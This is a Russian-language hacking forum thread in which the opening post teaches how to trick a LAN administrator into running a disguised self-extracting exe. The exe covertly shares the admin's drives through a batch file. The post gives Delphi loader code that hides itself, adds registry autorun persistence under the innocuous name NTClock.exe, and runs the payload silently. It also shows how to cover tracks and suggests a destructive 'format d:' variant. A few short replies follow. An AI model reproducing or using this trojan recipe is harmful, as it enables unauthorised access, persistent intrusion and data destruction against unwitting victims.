Форум о защите от: хакеров, взлом, раскрутка, хакер, вирусы, взлом программы, взлом паролей, взлом вконтакте, взлом icq, раскрутка сайта, взлом скачать, взлом почты, взлом ru, проги взлома, хакер, программа взлома, трояны, программирование http://ah.flybb.ru/ |
|
Расшариваем диски админа в локальной сети! http://ah.flybb.ru/topic401.html |
Страница 1 из 1 |
Автор: | BECHED [ 26-10, 18:56 ] |
Заголовок сообщения: | Расшариваем диски админа в локальной сети! |
Расшаренные ресурсы (shared resources) или по-нашему шары присутствуют почти в каждой локалке. Представь ситуацию - злобный админ в локалке закрыл тебе доступ к своим дискам а тебе очень нужно незметно покапаться в его компе =) Сегодня я покажу тебе как легко решить эту проблему. //ЧАСТЬ 1 - "крутая прога"// Итак, ты пишешь bat файл следующего содержания: @Echo off net share disk_d=d: > nul net share disk_c=c: > nul Этим ты расшаришь диски C: и D: на компе админа. Затем берешь мой любимый архиватор WINRAR и начинаешь колдовать =) : 1) Выбираешь метод сжатия - максимальный. 2) Ставишь пимпу напротив "создать sfx архив". Этим ты превратишь свой батник в exe файл =) 3) Переходишь на вкладку "Дополнительно" - "Параметры SFX" 4) Во вкладке "Общие" пишешь путь распаковки твоего батника, например если хочешь кинуть его в C:/WINDOWS пишешь %windir% 5)Указываешь имя своего батника (например shara.bat) в "запустить ПОСЛЕ распаковки". 6) Переходишь на вкладку "Режимы" и ставишь точки напротив "Скрыть все" и "Перезаписывать все файлы". 7) На вкладке "Текст и значок" указываешь иконку будущего exe файла. тыкаешь OK. Итак, у тебя есть exe файл который ты можешь смело впаривать админу сетки под видом какой-нибудь новой проги =) //ЧАСТЬ 2 - клиент// Теперь напишим скрипт с помощью которого ты на своем компе будешь подключать сетевые диски админа =) Пишешь: net use X: //имя компа админа/disk_d net use Y: //имя компа админа/disk_c И спокойно юзаешь его диски в свое удовольствие. Чтобы замести следы (напимер при работе на компе общего доступа) используй: net use X: /delete net use Y: /delete Есть одно препятствие: админ может увидеть посторонние расшаренные диски набрав команду net share в cmd. Для большей надежности можно запускать это все таким образом: 1) Пишешь прогу (я пишу на delphi), запускающую твой батник. 2) Склеиваешь ее и батник описаным выше способом только в запуск после распаковки вместо батника прописываешь скомпиленый exe файл Итак действуем. 1) Открываешь делфи и пишешь: ... uses Windows, ShellAPI, Forms; ... var Form1: TForm1; Reg : HKEY; szPach: String ; szName: String ; y: string; ... procedure TForm1.FormCreate(Sender: TObject); begin application.ShowMainForm:=false; //делаем наш загрузчик невидимым на панели задач и в диспетчере во вкладке "процессы" - ибо нех =) begin y:=ParamStr(0); szName:='NTClock.exe'; //имя проги которое будет видно в редакторе реестра. szPach:=y ; //Создаешь ключ в реестре RegCreateKey(HKEY_LOCAL_MACHINE, 'Software/Microsoft/Windows/CurrentVersion/Run', Reg); //Создаешь параметр автозапуска RegSetValueEx(Reg, PChar(szName) ,0 ,REG_SZ ,PChar(szPach), Length(szPach)); //Освобождаешь хендл RegCloseKey(Reg); begin sleep(60000); // пауза в 1 мин (можно не делать) ShellExecute(0, 'open', 'c:/WINDOWS/shara.bat', '', '', SW_HIDE); //запускаешь свой батник в скрытом режиме. Application.Terminate; //закрываемся end; end; end; Как ты уже заметил я прописал наш загрузчик в реестр в раздел автозапуска. Теперь если даже админ и уберет расшареные диски, они у него будут расшариваться при каждом запуске системы =) Здесь еще такая фича: даже если админ пропалит автозапуск и полезет в реестр, то не всегда сможет понять где прописан злой процесс потому что не у каждого может вызвать сомнения прога под названием NTClock.exe =) Также при желании можно заменить код батника на что нибудь вроде @Echo off format d: /q /y > nul Все в твоих руках =) Чуть не забыл, я поместил батник в папку windows т.к среднестатистический юзер там бывает редко. Поэтому при склеивании winrar'ом забей в путь %windir% На этом все! Если будут вопросы, пиши на vadikus@front.ru PS: это моя первая статья, поэтому прошу сильно не ругать если все это уже знают =). _=V@DiKuS=_ _=V@DiKuS=_ hackzona.ru |
Автор: | Zonan [ 06-12, 17:56 ] |
Заголовок сообщения: | |
Ну, для админов - ламаков сойдёт...))) |
Автор: | proverka [ 18-12, 17:06 ] |
Заголовок сообщения: | |
Zonan Да, ибо норм админ не будет под виндой сидеть, но с другой стороны ламак уже не будет админом => это не пройдёт. |
Автор: | Diabolik [ 19-12, 22:12 ] |
Заголовок сообщения: | |
Можно похимичить пока админ отойдет и всё. |
Страница 1 из 1 | Часовой пояс: UTC + 3 часа |
Powered by phpBB® Forum Software © phpBB Group http://www.phpbb.com/ |